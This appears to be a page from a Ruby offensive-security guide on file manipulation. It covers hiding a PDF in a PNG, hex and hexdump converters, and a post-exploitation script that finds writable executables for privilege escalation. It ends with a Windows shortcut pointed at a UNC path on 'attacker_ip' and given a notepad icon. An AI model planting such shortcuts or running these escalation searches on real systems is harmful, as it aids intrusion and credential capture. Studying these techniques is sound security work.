File manipulation
Simple script to hide a file file.pdf in an image image.png then write it into steg.png image which is originally the image.png
Then, it recovers the file.pdf from steg.png to hola.pdf.
#!/usr/bin/env ruby# KING SABRI | @KINGSABRIfile1, file2 = ARGVsec_file = File.read file1 # 'file.pdf'nor_file = File.read file2 # 'image.png'sep = '*------------------------*'one_file = [nor_file, sep, sec_file]​# Write sec_file, sep, nor_file into steg.pngFile.open("steg.png", 'wb') do |stg|one_file.each do |f|stg.puts fendend​# Read steg.png to be like "one_file" arrayrecov_file = File.read('steg.png').force_encoding("BINARY").split(sep).last# Write sec_file to hola.pdfFile.open('hola.pdf', 'wb') {|file| file.print recov_file}
Note: This has nothing to do with bypassing AV.
hex-simple.rb
#!/usr/bin/env ruby# KING SABRI | @KINGSABRI# Simple file to hex converter script#file_name = ARGV[0]​file = File.open(file_name , 'rb')file2hex = file.read.each_byte.map { |b| '\x%02x' % b }.join # b.to_s(16).rjust(2, '0')​puts file2hex
ruby hex-simple.rb ../assembly/hellolinux
Or in one command line
ruby -e "puts File.open('hellolinux').read.each_byte.map { |b| '\x%02X' % b }.join"
return
\x7F\x45\x4C\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x34\x00\x00\x00\xCC\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xA2\x00\x00\x00\xA2\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xA4\x00\x00\x00\xA4\x90\x04\x08\xA4\x90\x04\x08\x0E\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\xB9\xA4\x90\x04\x08\xBA\x0D\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80\x00\x00\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x2E\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2E\x74\x65\x78\x74\x00\x2E\x64\x61\x74\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xA4\x90\x04\x08\xA4\x00\x00\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB2\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
Note if want to change the hex prefix from \x to anything, just change
'\x%x'to whatever you want, or remove it!.
hexdump.rb
#!/usr/bin/env ruby## Source: http://c2.com/cgi/wiki?HexDumpInManyProgrammingLanguages#def hexdump(filename, start = 0, finish = nil, width = 16)ascii = ''counter = 0print '%06x ' % startFile.open(filename).each_byte do |c|if counter >= startprint '%02x ' % cascii << (c.between?(32, 126) ? c : ?.)if ascii.length >= widthputs asciiascii = ''print '%06x ' % (counter + 1)endendthrow :done if finish && finish <= countercounter += 1end rescue :doneputs ' ' * (width - ascii.length) + asciiend​if $0 == __FILE__if ARGV.empty?hexdump $0elsefilename = ARGV.shifthexdump filename, *(ARGV.map {|arg| arg.to_i })endend
ruby hexdump.rb hellolinux
return
000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............000010 02 00 03 00 01 00 00 00 80 80 04 08 34 00 00 00 ............4...000020 cc 00 00 00 00 00 00 00 34 00 20 00 02 00 28 00 ........4. ...(.000030 04 00 03 00 01 00 00 00 00 00 00 00 00 80 04 08 ................000040 00 80 04 08 a2 00 00 00 a2 00 00 00 05 00 00 00 ................000050 00 10 00 00 01 00 00 00 a4 00 00 00 a4 90 04 08 ................000060 a4 90 04 08 0e 00 00 00 0e 00 00 00 06 00 00 00 ................000070 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................000080 b8 04 00 00 00 bb 01 00 00 00 b9 a4 90 04 08 ba ................000090 0d 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 ................0000a0 cd 80 00 00 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 ....Hello, World0000b0 21 0a 00 2e 73 68 73 74 72 74 61 62 00 2e 74 65 !...shstrtab..te0000c0 78 74 00 2e 64 61 74 61 00 00 00 00 00 00 00 00 xt..data........0000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................0000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................0000f0 00 00 00 00 0b 00 00 00 01 00 00 00 06 00 00 00 ................000100 80 80 04 08 80 00 00 00 22 00 00 00 00 00 00 00 ........".......000110 00 00 00 00 10 00 00 00 00 00 00 00 11 00 00 00 ................000120 01 00 00 00 03 00 00 00 a4 90 04 08 a4 00 00 00 ................000130 0e 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................000140 00 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 ................000150 00 00 00 00 b2 00 00 00 17 00 00 00 00 00 00 00 ................000160 00 00 00 00 01 00 00 00 00 00 00 00 ............
One of the important task to do post exploitation is find weak executable file permissions which might be executed buy root/administrator user trying to elevate our privileges on the system. At the same time, our scripts must be applicable for all systems
find777.rb
# KING SABRI | @KINGSABRI# Find all executable, writable files in the path#require 'find'​path = ARGV[0]​search = Find.find(path)​def wx_file(search)search.select do |file|File.file?(file) && File.executable?(file) && File.writable?(file)endend​puts wx_file search
You can search for read, write, execute permissions, so your iteration block will be like
search.select do |file|File.stat(file).mode.to_s(8)[-3..-1].to_i == 777end
Install win32-shortcut gem
gem install win32-shortcut
Note: this example works only on windows since it uses Windows APIs
# KING SABRI | @KINGSABRI# gem install win32-shortcutrequire 'win32/shotcut'include Win32​Shortcut.new() do |s|s.description = 'Rubyfu's.path = '\\attacker_ip\rubyfu.png's.show_cmd = Shortcut::SHOWNORMALs.icon_location = 'notepad.exe'end
